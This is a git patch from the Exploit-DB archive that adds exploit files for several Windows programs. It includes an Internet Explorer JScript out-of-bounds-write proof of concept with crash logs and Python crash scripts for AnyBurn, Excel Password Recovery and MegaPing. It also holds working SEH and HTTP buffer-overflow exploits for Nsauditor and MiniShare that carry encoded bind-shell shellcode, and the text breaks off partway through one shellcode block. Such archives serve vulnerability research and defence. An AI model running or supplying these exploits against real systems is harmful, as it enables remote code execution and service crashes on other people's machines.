From c6ebf8bc236af0b9ee3c383c03282c0f01a37f01 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Wed, 19 Dec 2018 05:01:45 +0000
Subject: [PATCH] DB: 2018-12-19

10 changes to exploits/shellcodes

VMware Fusion 2.0.5 - vmx86 kext Local Buffer Overflow (PoC)
Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write
AnyBurn 4.3 - Local Buffer Overflow Denial of Service
Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service
MegaPing - Local Buffer Overflow Denial of Service

Exim 4.41 - 'dns_build_reverse' Local
Exim 4.41 - 'dns_build_reverse' Local Buffer Overflow

Microsoft Jet Database - 'msjet40.dll' Reverse Shell (2)
Microsoft Jet Database - 'msjet40.dll' Code Execution (Reverse Shell) (2)

Microsoft Windows Server 2003 - Token Kidnapping Local
Microsoft Windows Server 2003 - Token Kidnapping Local Privilege Escalation

VMware Fusion 2.0.5 - vmx86 kext Local

Nsauditor 3.0.28.0 - Local SEH Buffer Overflow

Google Android 2.0 < 2.1 - Reverse Shell
Google Android 2.0 < 2.1 - Code Execution (Reverse Shell 10.0.2.2:2222/TCP)

MiniShare 1.4.1 - Remote Buffer Overflow HEAD and POST Method

SDL Web Content Manager 8.5.0 - XML External Entity Injection
---
 exploits/osx/{local => dos}/10078.c |   0
 exploits/windows/dos/46001.html     | 149 ++++++++++++++++
 exploits/windows/dos/46002.py       |  28 +++
 exploits/windows/dos/46003.py       |  28 +++
 exploits/windows/dos/46004.py       |  28 +++
 exploits/windows/local/46005.py     |  65 +++++++
 exploits/windows/remote/45999.txt   | 263 ++++++++++++++++++++++++++++
 exploits/xml/webapps/46000.txt      |  33 ++++
 files_exploits.csv                  |  17 +-
 9 files changed, 606 insertions(+), 5 deletions(-)
 rename exploits/osx/{local => dos}/10078.c (100%)
 create mode 100644 exploits/windows/dos/46001.html
 create mode 100755 exploits/windows/dos/46002.py
 create mode 100755 exploits/windows/dos/46003.py
 create mode 100755 exploits/windows/dos/46004.py
 create mode 100755 exploits/windows/local/46005.py
 create mode 100644 exploits/windows/remote/45999.txt
 create mode 100644 exploits/xml/webapps/46000.txt

diff --git a/exploits/osx/local/10078.c b/exploits/osx/dos/10078.c
similarity index 100%
rename from exploits/osx/local/10078.c
rename to exploits/osx/dos/10078.c
diff --git a/exploits/windows/dos/46001.html b/exploits/windows/dos/46001.html
new file mode 100644
index 000000000..d6aacb53b
--- /dev/null
+++ b/exploits/windows/dos/46001.html
@@ -0,0 +1,149 @@
+<!--
+There is an out-of-bounds write vulnerability in jscript.dll in JsArrayFunctionHeapSort function. This vulnerability can be exploited through Internet Explorer or potentially through WPAD over local network. 
+
+PoC:
+=========================================================
+-->
+
+<!-- saved from url=(0014)about:internet -->
+<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>
+<script language="Jscript.Encode">
+
+function f0() { }
+
+function f1() {
+  f2.prototype = arguments;
+  new f2();
+}
+
+function f2() {
+  Array.prototype.sort.call(this, f0);
+}
+
+f1(1, 2, 3);
+
+</script>
+
+<!--
+=========================================================
+
+Details:
+
+JsArrayFunctionHeapSort is called when sorting an array with a provided comparison function. One of its arguments is the number of elements in the input array/object. The function then allocates a temporary array of the this size, copies all properties of the input array/object into it (where property name is numeric and smaller than the "length" property of the input object) and proceeds to sort the temporary array. Normally, the allocated array is sufficient to store all the properties to be sorted. However, in the case of the attached PoC, where the sorted object prototype is the arguments object, when calculating the number of elements, the number of elements in the arguments object aren't taken into account, which leads to an overflow.
+
+
+Debug Log:
+=========================================================
+
+(1d50.1d80): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=c0c00003 ebx=07512fc0 ecx=0d1e3008 edx=074faf50 esi=0c3c6f30 edi=07512fc0
+eip=6d53a09e esp=096daa44 ebp=096daa6c iopl=0         nv up ei pl zr na pe nc
+cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
+jscript!NameTbl::GetValCore+0x54915:
+6d53a09e 8901            mov     dword ptr [ecx],eax  ds:002b:0d1e3008=????????
+
+0:007> k
+ # ChildEBP RetAddr  
+00 096daa6c 6d4e5775 jscript!NameTbl::GetValCore+0x54915
+01 096daa8c 6d4e66b1 jscript!NameTbl::GetValById+0x5f
+02 096daad4 6d551f30 jscript!NameTbl::GetVal+0x112
+03 096dab34 6d51d6ae jscript!NameTbl::GetVal+0x50
+04 096dac14 6d51d595 jscript!JsArrayFunctionHeapSort+0xe2
+05 096dac8c 6d4e7850 jscript!JsArraySort+0x1ed
+06 096dacf4 6d4e7730 jscript!NatFncObj::Call+0xe8
+07 096dad84 6d53ab8f jscript!NameTbl::InvokeInternal+0x2cb
+08 096dadbc 6d5432dd jscript!VAR::InvokeByDispID+0x56357
+09 096dae0c 6d4e7850 jscript!JsFncCall+0xbd
+0a 096dae74 6d4e7730 jscript!NatFncObj::Call+0xe8
+0b 096daf04 6d4e657c jscript!NameTbl::InvokeInternal+0x2cb
+0c 096daff8 6d4e74c1 jscript!VAR::InvokeByName+0x1b9
+0d 096db044 6d53ab21 jscript!VAR::InvokeDispName+0x3e
+0e 096db074 6d4e4813 jscript!VAR::InvokeByDispID+0x562e9
+0f 096db45c 6d4e3f7f jscript!CScriptRuntime::Run+0x129e
+10 096db558 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
+11 096db5b0 6d5003bb jscript!ScrFncObj::Call+0x7b
+12 096db63c 6d4eec30 jscript!ScrFncObj::Construct+0xeb
+13 096db6c4 6d53ab8f jscript!NameTbl::InvokeInternal+0x338
+14 096db6f8 6d4eeca4 jscript!VAR::InvokeByDispID+0x56357
+15 096dbae0 6d4e3f7f jscript!CScriptRuntime::Run+0x1ff8
+16 096dbbdc 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
+17 096dbc34 6d4e3d03 jscript!ScrFncObj::Call+0x7b
+18 096dbcc4 6d53ab8f jscript!NameTbl::InvokeInternal+0x2cb
+19 096dbcf8 6d4e4813 jscript!VAR::InvokeByDispID+0x56357
+1a 096dc0e0 6d4e3f7f jscript!CScriptRuntime::Run+0x129e
+1b 096dc1dc 6d4e3e03 jscript!ScrFncObj::CallWithFrameOnStack+0x15f
+1c 096dc234 6d4e4ae7 jscript!ScrFncObj::Call+0x7b
+1d 096dc2d8 6d4f32eb jscript!CSession::Execute+0x23d
+1e 096dc320 6d4f4d63 jscript!COleScript::ExecutePendingScripts+0x16b
+1f 096dc39c 6d4f4b49 jscript!COleScript::ParseScriptTextCore+0x206
+20 096dc3c8 6e5c7d14 jscript!COleScript::ParseScriptText+0x29
+21 096dc400 6e5c81eb MSHTML!CActiveScriptHolder::ParseScriptText+0x51
+22 096dc470 6e27d1d1 MSHTML!CScriptCollection::ParseScriptText+0x1c6
+23 096dc55c 6e27cd73 MSHTML!CScriptData::CommitCode+0x31e
+24 096dc5dc 6e27d90d MSHTML!CScriptData::Execute+0x232
+25 096dc5fc 6e5a4bb6 MSHTML!CHtmScriptParseCtx::Execute+0xed
+26 096dc650 6e582f12 MSHTML!CHtmParseBase::Execute+0x201
+27 096dc66c 6df9bd5f MSHTML!CHtmPost::Broadcast+0x18e
+28 096dc7a4 6e063799 MSHTML!CHtmPost::Exec+0x617
+29 096dc7c4 6e0636ff MSHTML!CHtmPost::Run+0x3d
+2a 096dc7e0 6e06aef7 MSHTML!PostManExecute+0x61
+2b 096dc7f4 6e06bce8 MSHTML!PostManResume+0x7b
+2c 096dc824 6e0524b8 MSHTML!CHtmPost::OnDwnChanCallback+0x38
+2d 096dc83c 6df4d4f3 MSHTML!CDwnChan::OnMethodCall+0x2f
+2e 096dc88c 6df4d072 MSHTML!GlobalWndOnMethodCall+0x1a1
+2f 096dc8e0 758962fa MSHTML!GlobalWndProc+0x103
+30 096dc90c 75896d3a user32!InternalCallWinProc+0x23
+31 096dc984 758977c4 user32!UserCallWinProcCheckWow+0x109
+32 096dc9e4 7589788a user32!DispatchMessageWorker+0x3b5
+33 096dc9f4 6f34ab7c user32!DispatchMessageW+0xf
+34 096dfbc0 6f3b75f8 IEFRAME!CTabWindow::_TabWindowThreadProc+0x464
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Windows\syswow64\iertutil.dll - 
+35 096dfc80 75b46b7c IEFRAME!LCIETab_ThreadProc+0x3e7
+*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Internet Explorer\IEShims.dll - 
+WARNING: Stack unwind information not available. Following frames may be wrong.
+36 096dfc98 72153a31 iertutil!PrivateCoInternetCombineIUri+0x2bbc
+37 096dfcd0 7554343d IEShims!IEShims_SetRedirectRegistryForThread+0x1c1
+38 096dfcdc 77d99802 kernel32!BaseThreadInitThunk+0xe
+39 096dfd1c 77d997d5 ntdll!__RtlUserThreadStart+0x70
+3a 096dfd34 00000000 ntdll!_RtlUserThreadStart+0x1b
+ 
+0:007> !heap -p -a 0d1e3008
+    address 0d1e3008 found in
+    _DPH_HEAP_ROOT @ 7d1000
+    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
+                                 a893bc8:          d1e2fe8               18 -          d1e2000             2000
+    723f8e89 verifier!AVrfDebugPageHeapAllocate+0x00000229
+    77e30fe6 ntdll!RtlDebugAllocateHeap+0x00000030
+    77deab8e ntdll!RtlpAllocateHeap+0x000000c4
+    77d93461 ntdll!RtlAllocateHeap+0x0000023a
+    75ff9d45 msvcrt!malloc+0x0000008d
+    6d51d645 jscript!JsArrayFunctionHeapSort+0x00000079
+    6d51d595 jscript!JsArraySort+0x000001ed
+    6d4e7850 jscript!NatFncObj::Call+0x000000e8
+    6d4e7730 jscript!NameTbl::InvokeInternal+0x000002cb
+    6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
+    6d5432dd jscript!JsFncCall+0x000000bd
+    6d4e7850 jscript!NatFncObj::Call+0x000000e8
+    6d4e7730 jscript!NameTbl::InvokeInternal+0x000002cb
+    6d4e657c jscript!VAR::InvokeByName+0x000001b9
+    6d4e74c1 jscript!VAR::InvokeDispName+0x0000003e
+    6d53ab21 jscript!VAR::InvokeByDispID+0x000562e9
+    6d4e4813 jscript!CScriptRuntime::Run+0x0000129e
+    6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
+    6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
+    6d5003bb jscript!ScrFncObj::Construct+0x000000eb
+    6d4eec30 jscript!NameTbl::InvokeInternal+0x00000338
+    6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
+    6d4eeca4 jscript!CScriptRuntime::Run+0x00001ff8
+    6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
+    6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
+    6d4e3d03 jscript!NameTbl::InvokeInternal+0x000002cb
+    6d53ab8f jscript!VAR::InvokeByDispID+0x00056357
+    6d4e4813 jscript!CScriptRuntime::Run+0x0000129e
+    6d4e3f7f jscript!ScrFncObj::CallWithFrameOnStack+0x0000015f
+    6d4e3e03 jscript!ScrFncObj::Call+0x0000007b
+    6d4e4ae7 jscript!CSession::Execute+0x0000023d
+    6d4f32eb jscript!COleScript::ExecutePendingScripts+0x0000016b
+-->
\ No newline at end of file
diff --git a/exploits/windows/dos/46002.py b/exploits/windows/dos/46002.py
new file mode 100755
index 000000000..4757cb322
--- /dev/null
+++ b/exploits/windows/dos/46002.py
@@ -0,0 +1,28 @@
+# Exploit Title: AnyBurn
+# Date: 15-12-2018=20
+# Vendor Homepage: http://www.anyburn.com/
+# Software Link : http://www.anyburn.com/anyburn_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 4.3 (32-bit)
+# Tested on: Windows 7 x64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+=20
+# Steps to Produce the Crash:=20
+# 1.- Run python code : AnyBurn.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open AnyBurn choose 'Copy disk to Image'
+# 4.- Paste the content of EVIL.txt into the field: 'Image file name'
+# 5.- Click 'Create Now' and you will see a crash.
+
+#!/usr/bin/env python
+
+buffer =3D "\x41" * 10000
+
+try:
+=09f=3Dopen("Evil.txt","w")
+=09print "[+] Creating %s bytes evil payload.." %len(buffer)
+=09f.write(buffer)
+=09f.close()
+=09print "[+] File created!"
+except:
+=09print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/46003.py b/exploits/windows/dos/46003.py
new file mode 100755
index 000000000..7e79ec230
--- /dev/null
+++ b/exploits/windows/dos/46003.py
@@ -0,0 +1,28 @@
+# Exploit Title: Excel Password Recovery Professional 
+# Date: 15-12-2018 
+# Vendor Homepage:https://www.recoverlostpassword.com/
+# Software Link :https://www.recoverlostpassword.com/downloads/excel_password_recovery_pro_trial.exe
+# Exploit Author: Achilles
+# Tested Version: 8.2.0.0
+# Tested on: Windows 7 64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+ 
+# Steps to Produce the Crash: 
+# 1.- Run python code : Excel_Password_Recovery.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Excel Password Recovery Professional
+# 4.- Paste the content of EVIL.txt into the field: 'E-Mail and Registrations Code'
+# 5.- Click 'Register' and you will see a crash.
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 5000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/dos/46004.py b/exploits/windows/dos/46004.py
new file mode 100755
index 000000000..53fd7c756
--- /dev/null
+++ b/exploits/windows/dos/46004.py
@@ -0,0 +1,28 @@
+# Exploit Title: MegaPing
+# Date: 15-12-2018 
+# Vendor Homepage: http://www.magnetosoft.com/
+# Software Link:   http://www.magnetosoft.com/downloads/win32/megaping_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 
+# Tested on: Windows 7 x64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+ 
+# Steps to Produce the Crash: 
+# 1.- Run python code : MegaPing.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open MegaPing choose from the left side: 'Finger'
+# 4.- Paste the content of EVIL.txt into the field: 'Destination Address List'
+# 5.- Click 'Start' and you will see a crash.
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 8000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/local/46005.py b/exploits/windows/local/46005.py
new file mode 100755
index 000000000..2de8d5a66
--- /dev/null
+++ b/exploits/windows/local/46005.py
@@ -0,0 +1,65 @@
+# Exploit Title: Nsauditor Local SEH Buffer Overflow
+# Date: 15-12-2018
+# Vendor Homepage:http://www.nsauditor.com
+# Software Link:  http://www.nsauditor.com/downloads/nsauditor_setup.exe
+# Exploit Author: Achilles
+# Tested Version: 3.0.28.0
+# Tested on: Windows XP SP3
+
+
+# 1.- Run python code : Nsauditor.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open Nsauditor
+# 4.- In the Window select 'Tools' > 'Dns Lookup'
+# 5.- Paste the content of EVIL.txt into the Field: 'Dns Query'
+# 6.- Click 'Resolve'
+# 7.- Connect with Netcat on port 3110
+
+#!/usr/bin/python
+
+buffer = "\x41" * 5235
+NSEH = "\xeb\x06\x90\x90"  #jmp short 6
+SEH = "\x30\xFF\xE6\x01"   #nsnetutils.dll
+nops = "\x90" * 20
+
+#badchar \x00\x0a\x0d\x2e
+#msfvenom Bind port 3110
+buf =  ""
+buf += "\xd9\xc7\xb8\x8e\xe7\x77\xf1\xd9\x74\x24\xf4\x5b\x29"
+buf += "\xc9\xb1\x53\x83\xeb\xfc\x31\x43\x13\x03\xcd\xf4\x95"
+buf += "\x04\x2d\x12\xdb\xe7\xcd\xe3\xbc\x6e\x28\xd2\xfc\x15"
+buf += "\x39\x45\xcd\x5e\x6f\x6a\xa6\x33\x9b\xf9\xca\x9b\xac"
+buf += "\x4a\x60\xfa\x83\x4b\xd9\x3e\x82\xcf\x20\x13\x64\xf1"
+buf += "\xea\x66\x65\x36\x16\x8a\x37\xef\x5c\x39\xa7\x84\x29"
+buf += "\x82\x4c\xd6\xbc\x82\xb1\xaf\xbf\xa3\x64\xbb\x99\x63"
+buf += "\x87\x68\x92\x2d\x9f\x6d\x9f\xe4\x14\x45\x6b\xf7\xfc"
+buf += "\x97\x94\x54\xc1\x17\x67\xa4\x06\x9f\x98\xd3\x7e\xe3"
+buf += "\x25\xe4\x45\x99\xf1\x61\x5d\x39\x71\xd1\xb9\xbb\x56"
+buf += "\x84\x4a\xb7\x13\xc2\x14\xd4\xa2\x07\x2f\xe0\x2f\xa6"
+buf += "\xff\x60\x6b\x8d\xdb\x29\x2f\xac\x7a\x94\x9e\xd1\x9c"
+buf += "\x77\x7e\x74\xd7\x9a\x6b\x05\xba\xf2\x58\x24\x44\x03"
+buf += "\xf7\x3f\x37\x31\x58\x94\xdf\x79\x11\x32\x18\x7d\x08"
+buf += "\x82\xb6\x80\xb3\xf3\x9f\x46\xe7\xa3\xb7\x6f\x88\x2f"
+buf += "\x47\x8f\x5d\xc5\x4f\x36\x0e\xf8\xb2\x88\xfe\xbc\x1c"
+buf += "\x61\x15\x33\x43\x91\x16\x99\xec\x3a\xeb\x22\x1e\x9d"
+buf += "\x62\xc4\x74\xf1\x22\x5e\xe0\x33\x11\x57\x97\x4c\x73"
+buf += "\xcf\x3f\x04\x95\xc8\x40\x95\xb3\x7e\xd6\x1e\xd0\xba"
+buf += "\xc7\x20\xfd\xea\x90\xb7\x8b\x7a\xd3\x26\x8b\x56\x83"
+buf += "\xcb\x1e\x3d\x53\x85\x02\xea\x04\xc2\xf5\xe3\xc0\xfe"
+buf += "\xac\x5d\xf6\x02\x28\xa5\xb2\xd8\x89\x28\x3b\xac\xb6"
+buf += "\x0e\x2b\x68\x36\x0b\x1f\x24\x61\xc5\xc9\x82\xdb\xa7"
+buf += "\xa3\x5c\xb7\x61\x23\x18\xfb\xb1\x35\x25\xd6\x47\xd9"
+buf += "\x94\x8f\x11\xe6\x19\x58\x96\x9f\x47\xf8\x59\x4a\xcc"
+buf += "\x08\x10\xd6\x65\x81\xfd\x83\x37\xcc\xfd\x7e\x7b\xe9"
+buf += "\x7d\x8a\x04\x0e\x9d\xff\x01\x4a\x19\xec\x7b\xc3\xcc"
+buf += "\x12\x2f\xe4\xc4"
+
+payload = buffer + NSEH + SEH + nops + buf
+try:
+    f=open("EVIL.txt","w")
+    print "[+] Creating %s bytes evil payload.." %len(payload)
+    f.write(payload)
+    f.close()
+    print "[+] File created!"
+except:
+    print "File cannot be created"
\ No newline at end of file
diff --git a/exploits/windows/remote/45999.txt b/exploits/windows/remote/45999.txt
new file mode 100644
index 000000000..5cd7abe2d
--- /dev/null
+++ b/exploits/windows/remote/45999.txt
@@ -0,0 +1,263 @@
+Not only the GET method is vulnerable to BOF (CVE-2004-2271). HEAD and POST
+methods are also vulnerable. The difference is minimal, both are exploited
+in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length
+
+-------------------------------------------------------------------
+
+EAX 00000000
+ECX 77C3EF3B msvcrt.77C3EF3B
+EDX 00F14E38
+EBX 43346843
+ESP 01563908 ASCII
+"6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co
+HTTP/1.1
+"
+EBP 0156BB90
+ESI 00000001
+EDI 01565B68
+EIP 68433568
+C 0  ES 0023 32bit 0(FFFFFFFF)
+P 1  CS 001B 32bit 0(FFFFFFFF)
+A 1  SS 0023 32bit 0(FFFFFFFF)
+Z 0  DS 0023 32bit 0(FFFFFFFF)
+S 0  FS 003B 32bit 7FFDD000(FFF)
+T 0  GS 0000 NULL
+D 0
+O 0  LastErr ERROR_SUCCESS (00000000)
+EFL 00010216 (NO,NB,NE,A,NS,PE,GE,G)
+ST0 empty
+ST1 empty
+ST2 empty
+ST3 empty
+ST4 empty
+ST5 empty
+ST6 empty
+ST7 empty
+               3 2 1 0      E S P U O Z D I
+FST 0000  Cond 0 0 0 0  Err 0 0 0 0 0 0 0 0  (GT)
+FCW 027F  Prec NEAR,53  Mask    1 1 1 1 1 1
+
+------------------------------------------------------------------------------
+
+Only 210 bytes to shellcode
+
+------------------------------------------------------------------------------
+
+Badchars '00','0d'
+
+------------------------------------------------------------------------------
+
+>findjmp kernel32.dll esp - XP SP 3 English
+
+Scanning kernel32.dll for code useable with the esp register
+0x7C809F83      call esp
+0x7C8369E0      call esp
+0x7C83C2C5      push esp - ret
+0x7C87641B      call esp
+
+
+<!--
+# Exploit Title: Buffer overflow in MiniShare 1.4.1 HEAD method.
+# Date: 05-12-2018
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: http://minishare.sourceforge.net/
+# Software Link: http://minishare.sourceforge.net/
+# Version: Minishare v1.4.1
+# Tested on: Windows
+# CVE : CVE-2018-19861
+# Category: exploit
+
+1. Description
+
+Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
+execute arbitrary code via a long HTTP HEAD request.
+
+
+2. Proof of Concept
+
+Exploit:
+
+#!/usr/bin/env python
+import socket
+import struct
+import os
+
+# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
+execute arbitrary code via a long HTTP HEAD request - by Rafa
+# CVE: CVE-2018-19861
+# Via Egghunter because shellcode in ESP only 210 bytes long.
+# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
+connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+host = "127.0.0.1"
+port = 80
+
+# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
+egghunter =
+"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
+python -a x86 --platform windows -b "\x00\x0d" -f c
+#Found 10 compatible encoders
+#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
+#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
+#x86/shikata_ga_nai chosen with final size 355
+#Payload size: 355 bytes
+#Final size of c file: 1516 bytes
+#unsigned char buf[] =
+shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
+"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
+"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
+"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
+"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
+"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
+"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
+"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
+"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
+"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
+"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
+"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
+"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
+"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
+"\x1a\x38\x91\x72\xf0\x51\x3a\x8f\xfb\x4c\xe7\x06\x1d\x04\x07"
+"\x4f\xb5\xb0\xe5\xb4\x0e\x27\x15\x9f\x26\xcf\x5e\xc9\xf1\xf0"
+"\x5e\xdf\x55\x66\xd5\x0c\x62\x97\xea\x18\xc2\xc0\x7d\xd6\x83"
+"\xa3\x1c\xe7\x89\x53\xbc\x7a\x56\xa3\xcb\x66\xc1\xf4\x9c\x59"
+"\x18\x90\x30\xc3\xb2\x86\xc8\x95\xfd\x02\x17\x66\x03\x8b\xda"
+"\xd2\x27\x9b\x22\xda\x63\xcf\xfa\x8d\x3d\xb9\xbc\x67\x8c\x13"
+"\x17\xdb\x46\xf3\xee\x17\x59\x85\xee\x7d\x2f\x69\x5e\x28\x76"
+"\x96\x6f\xbc\x7e\xef\x8d\x5c\x80\x3a\x16\x6c\xcb\x66\x3f\xe5"
+"\x92\xf3\x7d\x68\x25\x2e\x41\x95\xa6\xda\x3a\x62\xb6\xaf\x3f"
+"\x2e\x70\x5c\x32\x3f\x15\x62\xe1\x40\x3c")
+
+# findjmp kernel32.dll esp - WinXP SP3 English
+#0x7C809F83      call esp
+
+nops = "\x90" * 16
+
+junk = "A" * 1786 + "\x83\x9f\x80\x7c" + nops + egghunter + "C" * (2000 -
+1786 - 4 - 16 - len(egghunter))
+
+try:
+print "Sending exploit..."
+connection.connect((host,port))
+buffer = (
+"HEAD " + junk + " HTTP/1.1\r\n"
+"Host: " + shellcode + "\r\n\r\n")
+
+connection.send(buffer)
+connection.close()
+print "\nExploit Sended ", len(buffer)
+except:
+print "Connection error"
+
+
+
+3. Solution:
+
+This product is deprecated
+
+-->
+
+
+<!--
+# Exploit Title: Buffer overflow in MiniShare 1.4.1 POST method.
+# Date: 05-12-2018
+# Exploit Author: Rafael Pedrero
+# Vendor Homepage: http://minishare.sourceforge.net/
+# Software Link: http://minishare.sourceforge.net/
+# Version: Minishare v1.4.1
+# Tested on: Windows
+# CVE : CVE-2018-19862
+# Category: exploit
+
+1. Description
+
+Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
+execute arbitrary code via a long HTTP POST request.
+
+
+2. Proof of Concept
+
+Exploit:
+
+#!/usr/bin/env python
+import socket
+import struct
+import os
+
+# Buffer overflow in MiniShare 1.4.1 and earlier allows remote attackers to
+execute arbitrary code via a long HTTP POST request - by Rafa
+# CVE: CVE-2018-19862
+# Via Egghunter because shellcode in ESP only 210 bytes long.
+# Project Home Page (MiniShare) - http://minishare.sourceforge.net/
+connection=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+host = "127.0.0.1"
+port = 80
+
+# 32 bytes Egghunter - Egg = r4f4 = \x72\x34\x66\x34
+egghunter =
+"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
+
+#msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f
+python -a x86 --platform windows -b "\x00\x0d" -f c
+#Found 10 compatible encoders
+#Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
+#x86/shikata_ga_nai succeeded with size 355 (iteration=0)
+#x86/shikata_ga_nai chosen with final size 355
+#Payload size: 355 bytes
+#Final size of c file: 1516 bytes
+#unsigned char buf[] =
+shellcode=("r4f4r4f4"+"\xda\xd4\xb8\xda\xe7\x1b\xca\xd9\x74\x24\xf4\x5a\x31\xc9\xb1"
+"\x53\x83\xea\xfc\x31\x42\x13\x03\x98\xf4\xf9\x3f\xe0\x13\x7f"
+"\xbf\x18\xe4\xe0\x49\xfd\xd5\x20\x2d\x76\x45\x91\x25\xda\x6a"
+"\x5a\x6b\xce\xf9\x2e\xa4\xe1\x4a\x84\x92\xcc\x4b\xb5\xe7\x4f"
+"\xc8\xc4\x3b\xaf\xf1\x06\x4e\xae\x36\x7a\xa3\xe2\xef\xf0\x16"
+"\x12\x9b\x4d\xab\x99\xd7\x40\xab\x7e\xaf\x63\x9a\xd1\xbb\x3d"
+"\x3c\xd0\x68\x36\x75\xca\x6d\x73\xcf\x61\x45\x0f\xce\xa3\x97"
+"\xf0\x7d\x8a\x17\x03\x7f\xcb\x90\xfc\x0a\x25\xe3\x81\x0c\xf2"
+"\x99\x5d\x98\xe0\x3a\x15\x3a\xcc\xbb\xfa\xdd\x87\xb0\xb7\xaa"
+"\xcf\xd4\x46\x7e\x64\xe0\xc3\x81\xaa\x60\x97\xa5\x6e\x28\x43"
+"\xc7\x37\x94\x22\xf8\x27\x77\x9a\x5c\x2c\x9a\xcf\xec\x6f\xf3"
+"\x3c\xdd\x8f\x03\x2b\x56\xfc\x31\xf4\xcc\x6a\x7a\x7d\xcb\x6d"
+"\x7d\x54\xab\xe1\x80\x57\xcc\x28\x47\x03\x9c\x42\x6e\x2c\x77"
+"\x92\x8f\xf9\xe2\x9a\x36\x52\x11\x67\x88\x02\x95\xc7\x61\x49"
